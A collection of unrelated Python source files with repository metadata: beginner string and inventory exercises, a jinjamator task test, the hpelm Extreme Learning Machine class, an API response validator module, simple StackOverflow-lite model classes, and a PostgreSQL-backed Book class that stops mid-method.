refs/heads/master
| 2023-08-28T01:31:21.995984
| 2021-10-27T16:08:30
| 2021-10-27T16:08:30
| 391,495,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 838
|
py
|
info = "I am abir"
x = info.split()
print(x)
def myFun(str):
str = str.split()
res = ""
for i in range(len(str)):
word = str[i]
res += word[0].upper()
return res
print(myFun(info))
# for i in range(len(info)):
# z = info[i]
# print(z)
def reverse(str):
res = ""
for i in str:
res = i + res
return res
print(reverse(info))
def plaindron(str):
new = ""
rev = ""
res = ""
for i in str:
if i != res:
new = new + i
rev = i + rev
if new == rev:
return True
else:
return False
print(plaindron("madam"))
arr = [2, 4, 5, 6, 6, 7, 7]
def dup(arr):
res = []
seen = set()
for i in arr:
if i not in seen:
seen.add(i)
res.append(i)
return res
print(dup(arr))
|
[
"yusuf_ctg@yahoo.com"
] |
yusuf_ctg@yahoo.com
|
02e1886687e685e3453d23f41cb3360130636eed
|
aa9b90475c72cea499cc2149770547c2f23dca79
|
/tests/plugins/content/task/01_run.py
|
83c48c18f73923596dbb135caccd4fb3c31dc0a5
|
[
"Apache-2.0"
] |
permissive
|
DrackThor/jinjamator
|
cfa0f58bb78a5a7ae8f3c7f3fe23ead35496afc2
|
9a61f76e3ddc9cb7c6fa20a5bd63963a49777318
|
refs/heads/master
| 2022-07-31T02:20:12.268091
| 2020-04-30T08:33:08
| 2020-04-30T08:33:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
ok = True
for subtask_path, return_value in task.run(".subtask1/", output_plugin="null").items():
if "01_tasklet_1" not in subtask_path:
ok = False
if return_value != "OK":
ok = False
if ok:
return "OK"
else:
return "NOT OK"
|
[
"jinjamator@aci.guru"
] |
jinjamator@aci.guru
|
7a8f839a3ef43d59643127a209d4684b91d188f4
|
eefb06b0d8c8c98c1e9cfc4c3852d5c453eb5429
|
/data/input/akusok/hpelm/hpelm/elm.py
|
75618f3e9ee6d4cb01745a484eadfd24ec48794c
|
[] |
no_license
|
bopopescu/pythonanalyzer
|
db839453bde13bf9157b76e54735f11c2262593a
|
8390a0139137574ab237b3ff5fe8ea61e8a0b76b
|
refs/heads/master
| 2022-11-22T02:13:52.949119
| 2019-05-07T18:42:52
| 2019-05-07T18:42:52
| 282,079,884
| 0
| 0
| null | 2020-07-23T23:46:09
| 2020-07-23T23:46:08
| null |
UTF-8
|
Python
| false
| false
| 26,584
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from six.moves import cPickle
from six import integer_types
from tables import open_file
from .nnets.slfn import SLFN
from .nnets.slfn_python import SLFNPython
from .modules import mrsr, mrsr2
from .mss_v import train_v
from .mss_cv import train_cv
from .mss_loo import train_loo
class ELM(object):
"""Interface for training Extreme Learning Machines (ELM).
Args:
inputs (int): dimensionality of input data, or number of data features
outputs (int): dimensionality of output data, or number of classes
classification ('c'/'wc'/'ml', optional): train ELM for classfication ('c') / weighted classification ('wc') /
multi-label classification ('ml'). For weighted classification you can provide weights in `w`. ELM will
compute and use the corresponding classification error instead of Mean Squared Error.
w (vector, optional): weights vector for weighted classification, lenght (`outputs` * 1).
batch (int, optional): batch size for data processing in ELM, reduces memory requirements. Does not work
for model structure selection (validation, cross-validation, Leave-One-Out). Can be changed later directly
as a class attribute.
accelerator ("GPU"/"basic", optional): type of accelerated ELM to use: None, 'GPU', 'basic', ...
precision (optional): data precision to use, supports signle ('single', '32' or numpy.float32) or double
('double', '64' or numpy.float64). Single precision is faster but may cause numerical errors. Majority
of GPUs work in single precision. Default: **double**.
norm (double, optinal): L2-normalization parameter, **None** gives the default value.
tprint (int, optional): ELM reports its progess every `tprint` seconds or after every batch,
whatever takes longer.
Class attributes; attributes that simply store initialization or `train()` parameters are omitted.
Attributes:
nnet (object): Implementation of neural network with computational methods, but without
complex logic. Different implementations are given by different classes: for Python, for GPU, etc.
See ``hpelm.nnets`` folder for particular files. You can implement your own computational algorithm
by inheriting from ``hpelm.nnets.SLFN`` and overwriting some methods.
flist (list of strings): Awailable types of neurons, use them when adding new neurons.
Note:
Below the 'matrix' type means a 2-dimensional Numpy.ndarray.
"""
# TODO: note about HDF5 instead of matrix for Matlab compatibility
def __init__(self, inputs, outputs, classification="", w=None, batch=1000, accelerator=None,
precision='double', norm=None, tprint=5):
assert isinstance(inputs, integer_types), "Number of inputs must be integer"
assert isinstance(outputs, integer_types), "Number of outputs must be integer"
assert batch > 0, "Batch should be positive"
self.batch = int(batch)
self.precision = np.float64
if precision in (np.float32, np.float64):
self.precision = precision
elif 'double' in precision.lower() or '64' in precision:
self.precision = np.float64
elif 'single' in precision or '32' in precision:
self.precision = np.float32
else:
print("Unknown precision parameter: %s, using double precision" % precision)
# create SLFN solver to do actual computations
self.accelerator = accelerator
if accelerator is "GPU":
print("Using CUDA GPU acceleration with Scikit-CUDA")
from nnets.slfn_skcuda import SLFNSkCUDA
self.nnet = SLFNSkCUDA(inputs, outputs, precision=self.precision, norm=norm)
elif accelerator is "basic":
print("Using slower basic Python solver")
self.nnet = SLFN(inputs, outputs, precision=self.precision, norm=norm)
else: # double precision Numpy solver
self.nnet = SLFNPython(inputs, outputs, precision=self.precision, norm=norm)
# init other stuff
self.classification = None # train ELM for classification
if classification.lower() in ("c", "wc", "ml", "mc"): # allow 'mc'=='ml' for compatibility
self.classification = classification.replace("mc", "ml")
self.wc = None # weighted classification weights
if w is not None:
w = np.array(w)
assert len(w) == outputs, "Number of class weights must be equal to the number of classes"
self.wc = w
self.opened_hdf5 = [] # list of opened HDF5 files, they are closed in ELM descructor
self.ranking = None
self.kmax_op = None
self.tprint = tprint # time intervals in seconds to report ETA
self.flist = ("lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf") # supported neuron types
def __str__(self):
s = "ELM with %d inputs and %d outputs\n" % (self.nnet.inputs, self.nnet.outputs)
s += "Hidden layer neurons: "
for n, func, _, _ in self.nnet.neurons:
s += "%d %s, " % (n, func)
s = s[:-2]
return s
def _train_parse_args(self, args, kwargs):
"""Parse training args and set corresponding class variables."""
assert len(self.nnet.neurons) > 0, "Add neurons to ELM before training it"
args = [a.upper() for a in args] # make all arguments upper case
# reset parameters
self.nnet.reset() # remove previous training
self.ranking = None
self.kmax_op = None
self.classification = None # c / wc / ml
self.wc = None # weigths for weighted classification
# check exclusive parameters
assert len(set(args).intersection({"V", "CV", "LOO"})) <= 1, "Use only one of V / CV / LOO"
msg = "Use only one of: C (classification) / WC (weighted classification) / ML (multi-label classification)"
assert len(set(args).intersection({"C", "WC", "ML", "MC"})) <= 1, msg
# parse parameters
for a in args:
if a == "OP":
self.ranking = "OP"
if "kmax" in kwargs.keys():
self.kmax_op = int(kwargs["kmax"])
if a == "C":
assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
self.classification = "c"
if a == "WC":
assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
self.classification = "wc"
if 'w' in kwargs.keys():
w = np.array(kwargs['w'])
assert len(w) == self.nnet.outputs, "Number of class weights must be equal to the number of classes"
self.wc = w
if a == "ML" or a == "MC":
assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
self.classification = "ml"
if a == "R":
self.classification = None # reset to regression
if "batch" in kwargs.keys():
self.batch = int(kwargs["batch"])
def train(self, X, T, *args, **kwargs):
"""Universal training interface for ELM model with model structure selection.
Model structure selection takes more time and requires all data to fit into memory. Optimal pruning ('OP',
effectively an L1-regularization) takes the most time but gives the smallest and best performing model.
Choosing a classification forces ELM to use classification error in model structure selection,
and in `error()` method output.
Args:
X (matrix): input data matrix, size (N * `inputs`)
T (matrix): outputs data matrix, size (N * `outputs`)
'V'/'CV'/'LOO' (sting, choose one): model structure selection: select optimal number of neurons using
a validation set ('V'), cross-validation ('CV') or Leave-One-Out ('LOO')
'OP' (string, use with 'V'/'CV'/'LOO'): choose best neurons instead of random ones, training takes longer;
equivalent to L1-regularization
'c'/'wc'/'ml'/'r' (string, choose one): train ELM for classification ('c'), classification with weighted
classes ('wc'), multi-label classification ('ml') with several correct classes per data sample, or
regression ('r') without any classification. In classification, number of `outputs` is the number
of classes; correct class(es) for each sample has value 1 and incorrect classes have 0.
Overwrites parameters given an ELM initialization time.
Keyword Args:
Xv (matrix, use with 'V'): validation set input data, size (Nv * `inputs`)
Tv (matrix, use with 'V'): validation set outputs data, size (Nv * `outputs`)
k (int, use with 'CV'): number of splits for cross-validation, k>=3
kmax (int, optional, use with 'OP'): maximum number of neurons to keep in ELM
batch (int, optional): batch size for ELM, overwrites batch size from the initialization
Returns:
e (double, for 'CV'): test error for cross-validation, computed from one separate test chunk in each
split of data during the cross-validation procedure
"""
X, T = self._checkdata(X, T)
self._train_parse_args(args, kwargs)
# TODO: test upper case and lower case 'V', ...
# train ELM with desired model structure selection
if "V" in args: # use validation set
assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
assert "Tv" in kwargs.keys(), "Provide validation outputs (Tv)"
Xv = kwargs['Xv']
Tv = kwargs['Tv']
Xv, Tv = self._checkdata(Xv, Tv)
train_v(self, X, T, Xv, Tv)
elif "CV" in args: # use cross-validation
assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
k = kwargs['k']
assert k >= 3, "Use at least k=3 splits for Cross-Validation"
e = train_cv(self, X, T, k)
return e
elif "LOO" in args: # use Leave-One-Out error on training set
train_loo(self, X, T)
else: # basic training algorithm
self.add_data(X, T)
self.nnet.solve()
# TODO: Adaptive ELM model for timeseries (someday)
def add_data(self, X, T):
"""Feed new training data (X,T) to ELM model in batches; does not solve ELM itself.
Helper method that updates intermediate solution parameters HH and HT, which are used for solving ELM later.
Updates accumulate, so this method can be called multiple times with different parts of training data.
To reset accumulated training data, use `ELM.nnet.reset()`.
For training an ELM use `ELM.train()` instead.
Args:
X (matrix): input training data
T (matrix): output training data
"""
# initialize batch size
nb = int(np.ceil(float(X.shape[0]) / self.batch))
wc_vector = None
# find automatic weights if none are given
if self.classification == "wc" and self.wc is None:
ns = T.sum(axis=0).astype(self.precision) # number of samples in classes
self.wc = ns.sum() / ns # weights of classes
for X0, T0 in zip(np.array_split(X, nb, axis=0),
np.array_split(T, nb, axis=0)):
if self.classification == "wc":
wc_vector = self.wc[np.where(T0 == 1)[1]] # weights for samples in the batch
self.nnet.add_batch(X0, T0, wc_vector)
def add_neurons(self, number, func, W=None, B=None):
"""Adds neurons to ELM model. ELM is created empty, and needs some neurons to work.
Add neurons to an empty ELM model, or add more neurons to a model that already has some.
Random weights `W` and biases `B` are generated automatically if not provided explicitly.
Maximum number of neurons is limited by the available RAM and computational power, a sensible limit
would be 1000 neurons for an average size dataset and 15000 for the largest datasets. ELM becomes slower after
3000 neurons because computational complexity is proportional to a qube of number of neurons.
This method checks and prepares neurons, they are actually stored in `solver` object.
Args:
number (int): number of neurons to add
func (string): type of neurons: "lin" for linear, "sigm" or "tanh" for non-linear,
"rbf_l1", "rbf_l2" or "rbf_linf" for radial basis function neurons.
W (matrix, optional): random projection matrix size (`inputs` * `number`). For 'rbf_' neurons,
W stores centroids of radial basis functions in transposed form.
B (vector, optional): bias vector of size (`number` * 1), a 1-dimensional Numpy.ndarray object.
For 'rbf_' neurons, B gives widths of radial basis functions.
"""
assert isinstance(number, integer_types), "Number of neurons must be integer"
assert (func in self.flist or isinstance(func, np.ufunc)),\
"'%s' neurons not suppored: use a standard neuron function or a custom <numpy.ufunc>" % func
assert isinstance(W, (np.ndarray, type(None))), "Projection matrix (W) must be a Numpy ndarray"
assert isinstance(B, (np.ndarray, type(None))), "Bias vector (B) must be a Numpy ndarray"
inputs = self.nnet.inputs
# default neuron initializer
if W is None:
if func == "lin": # copying input features for linear neurons
number = min(number, inputs) # cannot have more linear neurons than features
W = np.eye(inputs, number)
else:
W = np.random.randn(inputs, number)
if func not in ("rbf_l1", "rbf_l2", "rbf_linf"):
W *= 3.0 / inputs**0.5 # high dimensionality fix
if B is None:
B = np.random.randn(number)
if func in ("rbf_l2", "rbf_l1", "rbf_linf"):
B = np.abs(B)
B *= inputs
if func == "lin":
B = np.zeros((number,))
msg = "W must be size [inputs, neurons] (expected [%d,%d])" % (inputs, number)
assert W.shape == (inputs, number), msg
assert B.shape == (number,), "B must be size [neurons] (expected [%d])" % number
# set to correct precision
W = W.astype(self.precision)
B = B.astype(self.precision)
# add prepared neurons to the model
self.nnet.add_neurons(number, func, W, B)
def error(self, T, Y):
"""Calculate error of model predictions.
Computes Mean Squared Error (MSE) between model predictions Y and true outputs T.
For classification, computes mis-classification error.
For multi-label classification, correct classes are all with Y>0.5.
For weighted classification the error is an average weighted True Positive Rate,
or percentage of correctly predicted samples for each class, multiplied by weight
of that class and averaged. If you want something else, just write it yourself :)
See https://en.wikipedia.org/wiki/Confusion_matrix for details.
Another option is to use scikit-learn's performance metrics. Transform `Y` and `T` into scikit's
format by ``y_true = T.argmax[1]``, ``y_pred = Y.argmax[1]``.
http://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
Args:
T (matrix): true outputs.
Y (matrix): ELM model predictions, can be computed with `predict()` function.
Returns:
e (double): MSE for regression / classification error for classification.
"""
_, T = self._checkdata(None, T)
_, Y = self._checkdata(None, Y)
return self._error(T, Y)
def confusion(self, T, Y):
"""Computes confusion matrix for classification.
Confusion matrix :math:`C` such that element :math:`C_{i,j}` equals to the number of observations known
to be class :math:`i` but predicted to be class :math:`j`.
Args:
T (matrix): true outputs or classes, size (N * `outputs`)
Y (matrix): predicted outputs by ELM model, size (N * `outputs`)
Returns:
conf (matrix): confusion matrix, size (`outputs` * `outputs`)
"""
# TODO: ELM type can be assigned at creation time: "c", "wc", "ml"
assert self.classification in ("c", "wc", "ml"), "Confusion matrix works only for regression"
_, T = self._checkdata(None, T)
_, Y = self._checkdata(None, Y)
N = T.shape[0]
nb = int(np.ceil(float(N) / self.batch)) # number of batches
C = self.nnet.outputs
conf = np.zeros((C, C))
if self.classification in ("c", "wc"):
for b in xrange(nb):
start = b*self.batch
stop = min((b+1)*self.batch, N)
Tb = np.array(T[start:stop]).argmax(1)
Yb = np.array(Y[start:stop]).argmax(1)
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.logical_and(Tb == c1, Yb == c1h).sum()
elif self.classification == "ml":
for b in xrange(nb):
start = b*self.batch
stop = min((b+1)*self.batch, N)
Tb = np.array(T[start:stop]) > 0.5
Yb = np.array(Y[start:stop]) > 0.5
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum(Tb[:, c1] * Yb[:, c1h])
return conf
def project(self, X):
"""Get ELM's hidden layer representation of input data.
Args:
X (matrix): input data, size (N * `inputs`)
Returns:
H (matrix): hidden layer representation matrix, size (N * number_of_neurons)
"""
X, _ = self._checkdata(X, None)
H = self.nnet._project(X)
return H
def predict(self, X):
"""Predict outputs Y for the given input data X.
Args:
X (matrix): input data of size (N * `inputs`)
Returns:
Y (matrix): output data or predicted classes, size (N * `outputs`).
"""
X, _ = self._checkdata(X, None)
Y = self.nnet._predict(X)
return Y
def save(self, fname):
"""Save ELM model with current parameters.
Model does not save a particular solver, precision batch size. They are obtained from
a new ELM when loading the model (so one can switch to another solver, for instance).
Also ranking and max number of neurons are not saved, because they
are runtime training info irrelevant after the training completes.
Args:
fname (string): filename to save model into.
"""
assert isinstance(fname, basestring), "Model file name must be a string"
m = {"inputs": self.nnet.inputs,
"outputs": self.nnet.outputs,
"Classification": self.classification,
"Weights_WC": self.wc,
"neurons": self.nnet.get_neurons(),
"norm": self.nnet.norm, # W and bias are here
"Beta": self.nnet.get_B()}
try:
cPickle.dump(m, open(fname, "wb"), -1)
except IOError:
raise IOError("Cannot create a model file at: %s" % fname)
def load(self, fname):
"""Load ELM model data from a file.
Load requires an ``ELM`` object, and it uses solver type, precision and batch size from that ELM object.
Args:
fname (string): filename to load model from.
"""
assert isinstance(fname, basestring), "Model file name must be a string"
try:
m = cPickle.load(open(fname, "rb"))
except IOError:
raise IOError("Model file not found: %s" % fname)
inputs = m["inputs"]
outputs = m["outputs"]
self.classification = m["Classification"]
self.wc = m["Weights_WC"]
# create a new solver and load neurons / Beta into it with correct precision
if self.accelerator is None:
self.nnet = SLFN(inputs, outputs, precision=self.precision)
for number, func, W, B in m["neurons"]:
self.nnet.add_neurons(number, func, W.astype(self.precision), B.astype(self.precision))
self.nnet.norm = m["norm"]
if m["Beta"] is not None:
self.nnet.set_B(np.array(m["Beta"], dtype=self.precision))
def __del__(self):
# Closes any HDF5 files opened during HPELM usage.
for h5 in self.opened_hdf5:
h5.close()
def _error(self, T, Y, R=None):
"""Returns regression/classification/multiclass error, also for PRESS.
An ELM-specific error with PRESS support.
"""
if R is None: # normal classification error
if self.classification == "c":
err = np.not_equal(Y.argmax(1), T.argmax(1)).mean()
elif self.classification == "wc": # weighted classification
c = T.shape[1]
errc = np.zeros(c)
for i in xrange(c): # per-class MSE
idx = np.where(T[:, i] == 1)[0]
if len(idx) > 0:
errc[i] = np.not_equal(Y[idx].argmax(1), i).mean()
err = np.sum(errc * self.wc) / np.sum(self.wc)
elif self.classification == "ml":
err = np.not_equal(Y > 0.5, T > 0.5).mean()
else:
err = np.mean((Y - T)**2)
else: # LOO_PRESS error
if self.classification == "c":
err = np.not_equal(Y.argmax(1), T.argmax(1)) / R.ravel()
err = np.mean(err**2)
elif self.classification == "wc": # balanced classification
c = T.shape[1]
errc = np.zeros(c)
for i in xrange(c): # per-class MSE
idx = np.where(T[:, i] == 1)[0]
if len(idx) > 0:
t = np.not_equal(Y[idx].argmax(1), i) / R[idx].ravel()
errc[i] = np.mean(t**2)
err = np.mean(errc * self.wc)
elif self.classification == "ml":
err = np.not_equal(Y > 0.5, T > 0.5) / R.reshape((-1, 1))
err = np.mean(err**2)
else:
err = (Y - T) / R.reshape((-1, 1))
err = np.mean(err**2)
assert not np.isnan(err), "Error is NaN at %s" % self.classification
return np.float64(err)
def _ranking(self, L, H=None, T=None):
"""Return ranking of hidden neurons; random or OP.
Args:
L (int): number of neurons
H (matrix): hidden layer representation matrix needed for optimal pruning
T (matrix): outputs matrix needed for optimal pruning
Returns:
rank (vector): ranking of neurons
L (int): number of selected neurons, can be changed by `self.kmax_op`
"""
if self.ranking == "OP": # optimal ranking (L1 normalization)
assert H is not None and T is not None, "Need H and T to perform optimal pruning"
if self.kmax_op is not None: # apply maximum number of neurons
L = min(self.kmax_op, L)
if T.shape[1] < 10: # fast mrsr for less outputs but O(2^t) in outputs
rank = mrsr(H, T, L)
else: # slow mrsr for many outputs but O(t) in outputs
rank = mrsr2(H, T, L)
else: # random ranking
rank = np.arange(L)
np.random.shuffle(rank)
return rank, L
def _checkdata(self, X, T):
"""Checks data variables and fixes matrix dimensionality issues.
"""
if X is not None:
if isinstance(X, basestring): # open HDF5 file
try:
h5 = open_file(X, "r")
except:
raise IOError("Cannot read HDF5 file at %s" % X)
self.opened_hdf5.append(h5)
node = None
for node in h5.walk_nodes():
pass # find a node with whatever name
if node:
X = node
else:
raise IOError("Empty HDF5 file at %s" % X)
else:
# assert isinstance(X, np.ndarray) and
assert X.dtype.kind not in "OSU", "X must be a numerical numpy array"
if len(X.shape) == 1:
X = X.reshape(-1, 1)
assert len(X.shape) == 2, "X must have 2 dimensions"
assert X.shape[1] == self.nnet.inputs, "X has wrong dimensionality: expected %d, found %d" % \
(self.nnet.inputs, X.shape[1])
if T is not None:
if isinstance(T, basestring): # open HDF5 file
try:
h5 = open_file(T, "r")
except IOError:
raise IOError("Cannot read HDF5 file at %s" % T)
self.opened_hdf5.append(h5)
node = None
for node in h5.walk_nodes():
pass # find a node with whatever name
if node:
T = node
else:
raise IOError("Empty HDF5 file at %s" % X)
else:
# assert isinstance(T, np.ndarray) and
assert T.dtype.kind not in "OSU", "T must be a numerical numpy array"
if len(T.shape) == 1:
T = T.reshape(-1, 1)
assert len(T.shape) == 2, "T must have 2 dimensions"
assert T.shape[1] == self.nnet.outputs, "T has wrong dimensionality: expected %d, found %d" % \
(self.nnet.outputs, T.shape[1])
if (X is not None) and (T is not None):
assert X.shape[0] == T.shape[0], "X and T cannot have different number of samples"
return X, T
|
[
"rares.begu@gmail.com"
] |
rares.begu@gmail.com
|
e5b7b2a0eaf2d4a4f3b75aa835d0d5e97a95c621
|
2f79a610ee7b3291d408f935715464f84bfe1293
|
/Common/validator.py
|
3f92e8440cd99af17f58990d54c05f5e5148bba5
|
[] |
no_license
|
runnerhuang/autoapi
|
508ebd07b51758c29a520b9292588294e3967fc6
|
2601014b3be6c9aa4181a3cc9a1d4a127c01091e
|
refs/heads/master
| 2023-03-17T20:42:27.693522
| 2020-03-29T03:08:45
| 2020-03-29T03:08:45
| 247,009,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,697
|
py
|
import re
# from util import decode_str
def type_validator(params, value):
mark = 0
if isinstance(params, list):
if value == "list":
return True
for each in params:
if type(each).__name__ == "unicode":
if type(each.encode("utf-8")).__name__ in value:
mark += 1
else:
if type(each).__name__ in value:
mark += 1
if len(params) == mark:
return True
elif type(params).__name__ == value:
return True
return False
def type_in_validator(params, value):
mark = 0
if isinstance(params, list):
for each in params:
if type(each).__name__ == "unicode":
if type(each.encode("utf-8")).__name__ in value:
mark += 1
else:
if type(each).__name__ in value:
mark += 1
if mark == len(params):
return True
else:
if type(params).__name__ in value:
return True
return False
def between_validator(params, value):
mark = 0
if isinstance(params, list):
for each in params:
if not isinstance(params, int):
return False
if value[0] <= each <= value[1]:
mark += 1
if mark == len(params):
return True
else:
if not isinstance(params, int):
return False
if value[0] <= params <= value[1]:
return True
return False
def values_validator(params, value):
mark = 0
if isinstance(params, list):
for i in range(len(params)):
if params[i] in value:
mark += 1
if mark == len(params):
return True
else:
if params in value:
return True
return False
def len_list_validator(params, value):
if isinstance(params, list):
if isinstance(value, str):
if "*" in value or "/" in value or "+" in value or "-" in value:
value = int(eval(value))
if len(params) == value:
return True
return False
def len_validator(params, value):
mark = 0
if isinstance(params, list):
for each in params:
if len(each) == len(value):
mark += 1
if len(params) == mark:
return True
else:
if len(params) == len(value):
return True
return False
def equal_validator(params, value):
try:
if "*" in value or "/" in value or "+" in value or "-" in value:
value = eval(value)
except Exception as e:
pass
if str(params) == str(value):
return True
else:
return False
def not_equal_validator(params, value):
if params != value:
return True
else:
return False
def string_in_validator(params, value):
if value in params:
return True
else:
return False
def value_in_validator(params, value):
if isinstance(params, list):
if value in params:
return True
else:
if value == params:
return True
return False
def in_validator(param, value):
if isinstance(value, list):
if param in value:
# print "Find the value in index : %d" % value.index(param)
return True
elif isinstance(value, str):
if param == value:
return True
return False
def greater_validator(params, value):
if isinstance(value, str):
if params >= eval(value):
return True
else:
if params >= value:
return True
return False
def gv_validator(params, value):
if isinstance(value, int):
if params > value:
return True
else:
if params > eval(value):
return True
return False
def lv_validator(params, value):
if isinstance(value, int):
if params < value:
return True
else:
if params < eval(value):
return True
return False
def less_validator(params, value):
if params <= eval(value):
return True
else:
return False
def not_found_validator(params, value):
if isinstance(params, list):
if value not in params:
return True
elif isinstance(params, str):
if value not in params:
return True
elif params != value:
return True
else:
return False
def reg_validator(params, value):
# print decode_str(params)
mark = 0
if isinstance(params, list):
for each in params:
# if type(each).__name__ == "unicode":
# each = each.encode("utf-8")
try:
val = re.match(value, each)
if val.group(0):
mark += 1
except Exception as e:
print(e)
print("Cannot find the regular pattern @ return: {}".format(each))
return False
if mark == len(params):
return True
else:
try:
if type(value).__name__ == "unicode":
value = value.encode("utf-8")
val = re.match(value, params)
if val.group(0):
return True
except Exception as e:
print(e)
print("Cannot find the regular pattern @ return: {}".format(params))
return False
return False
class ValidatorRegistry(object):
registry = {}
@classmethod
def register(cls, name, validate):
cls.registry[name] = validate
@classmethod
def validate(cls, name, params, value):
return cls.registry[name].validate(params, value)
def checker(typo, params, value):
val = ValidatorRegistry()
if typo == "TYPE":
val.register("TYPE", type_validator(params, value))
if typo == "type":
val.register("type", type_validator(params, value))
if typo == "LEN":
val.register("LEN", len_validator(params, value))
if typo == "len":
val.register("len", len_validator(params, value))
if typo == "LE":
val.register("LE", less_validator(params, value))
if typo == "le":
val.register("le", less_validator(params, value))
if typo == "BETWEEN":
val.register("BETWEEN", between_validator(params, value))
if typo == "between":
val.register("between", between_validator(params, value))
if typo == "EQ":
val.register("EQ", equal_validator(params, value))
if typo == "eq":
val.register("eq", equal_validator(params, value))
if typo == "IN":
val.register("IN", in_validator(params, value))
if typo == "in":
val.register("in", in_validator(params, value))
if typo == "GE":
val.register("GE", greater_validator(params, value))
if typo == "ge":
val.register("ge", greater_validator(params, value))
if typo == "GV":
val.register("GV", gv_validator(params, value))
if typo == "gv":
val.register("gv", gv_validator(params, value))
if typo == "LV":
val.register("LV", lv_validator(params, value))
if typo == "lv":
val.register("lv", lv_validator(params, value))
if typo == "RE":
val.register("RE", reg_validator(params, value))
if typo == "re":
val.register("re", reg_validator(params, value))
if typo == "ALLIN":
val.register("ALLIN", values_validator(params, value))
if typo == "allin":
val.register("allin", values_validator(params, value))
if typo == "TYPEIN":
val.register("TYPEIN", type_in_validator(params, value))
if typo == "typein":
val.register("typein", type_in_validator(params, value))
if typo == "NF":
val.register("NF", not_found_validator(params, value))
if typo == "nf":
val.register("nf", not_found_validator(params, value))
if typo == "NEQ":
val.register("NEQ", not_equal_validator(params, value))
if typo == "neq":
val.register("neq", not_equal_validator(params, value))
if typo == "LL":
val.register("LL", len_list_validator(params, value))
if typo == "ll":
val.register("ll", len_list_validator(params, value))
if typo == "STRIN":
val.register("STRIN", string_in_validator(params, value))
if typo == "strin":
val.register("strin", string_in_validator(params, value))
if typo == "VIN":
val.register("VIN", value_in_validator(params, value))
if typo == "vin":
val.register("vin", value_in_validator(params, value))
return val.registry[typo]
|
[
"45131712@qq.com"
] |
45131712@qq.com
|
bea5502ce63a6fff87edbebaca3c08dde1c37919
|
8ac5c46450f9df9e184121d01a56ecdd1e8c0fa7
|
/v1/app/models.py
|
479b70222f447ff3a1d654337e6469922cf43456
|
[] |
no_license
|
mmosoroohh/StackOverflow-lite
|
1c4688fbceb107317857595898ba7952baea7642
|
93821a3a1057d17090be868b2419b44b0e4f2aa6
|
refs/heads/challenge3
| 2022-12-22T14:48:31.331212
| 2018-09-30T20:45:15
| 2018-09-30T20:45:15
| 144,048,461
| 0
| 1
| null | 2022-12-08T02:47:10
| 2018-08-08T17:47:13
|
Python
|
UTF-8
|
Python
| false
| false
| 637
|
py
|
class Question(object):
"""This class represents the Questions in StackOverflow-lite."""
def __init__(self, question, date_posted):
self.question = question
self.date_posted = date_posted
class Answer(object):
"""This class represents the Answers in StackOverflow."""
def __init__(self, answer, date_posted):
self.answer = answer
self.date_posted = date_posted
class User(object):
"""This class represents the Users in StackOverflow."""
def __init__(self, name, email, password):
self.name = name
self.email = email
self.password = password
|
[
"arnoldmaengwe@gmail.com"
] |
arnoldmaengwe@gmail.com
|
9d6e15e026649f4a430b934adcb95bdfec33e7f4
|
9ff397a95001895efa74a57815490704d1b681a7
|
/Chapter5/FantasyGameInventory.py
|
f35d0a56c85e7ccaac2d14debc167bff04f41a50
|
[] |
no_license
|
DanielNoble/PracticeProjects
|
1ba01fd4860bf74198d46f213961aad1555db8c2
|
346e4d47cca90f119e0fe03acc4202a77f86d3e4
|
refs/heads/master
| 2020-11-28T13:25:18.068777
| 2019-12-30T06:02:40
| 2019-12-30T06:02:40
| 229,829,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
print('Inventory:')
itemTotal = 0
for k, v in inventory.items():
print(str(v) + ' ' + k)
itemTotal += v
print('Total number of items: ' + str(itemTotal))
displayInventory(stuff)
print('\n\n\n')
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
def addToInventory(inventory, addedItems):
for k in addedItems:
inventory.setdefault(k, 0)
inventory[k] += 1
return inventory
inv = {'gold coin': 42, 'rope': 1}
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
inv = addToInventory(inv, dragonLoot)
displayInventory(inv)
|
[
"32727912+DanielNoble@users.noreply.github.com"
] |
32727912+DanielNoble@users.noreply.github.com
|
621a1b4889980fc7004bd33bf26646aa9958a3c0
|
d06492e426c5ce9030605d327acd462418f07045
|
/models/book.py
|
bb53658670dfe89e6f1d6320362a0e70dda4c253
|
[] |
no_license
|
olawale-kareem/Reader
|
688723fcf12c35188c0e864f566d0e96aa3f4fed
|
0d678bbf52a1c0b4ea8f9527e214c86a1903c047
|
refs/heads/master
| 2023-08-22T23:07:23.314852
| 2021-08-14T17:19:41
| 2021-08-14T17:19:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,794
|
py
|
import psycopg2
from psycopg2 import DatabaseError as Error
class Book:
def __init__(self):
self.connection = self.connect_db()
self.cursor = self.connect_db().cursor()
self.schema_file = '/Users/mac/week-6-assignment-olawale-kareem/schema.sql'
self.seeder_file = '/Users/mac/week-6-assignment-olawale-kareem/seeder.sql'
def connect_db(self):
try:
connection = psycopg2.connect(user='mac', password=None, host='127.0.0.1', port='5432',
database='test_script')
return connection
except (Exception, Error) as err:
return f'Error while connecting to the PostgreSQL {err}'
def load_schema_file(self):
try:
schema_file = open(self.schema_file, 'r')
schema_file_content = schema_file.readlines()
formatted_schema_file = ''.join(schema_file_content)
self.cursor.execute(formatted_schema_file)
self.connection.commit()
schema_file.close()
return "Tables created successfully in PostgreSQL"
except (Exception, Error) as err:
return f'Error while connecting to the PostgreSQL {err}'
def load_seeder_file(self):
try:
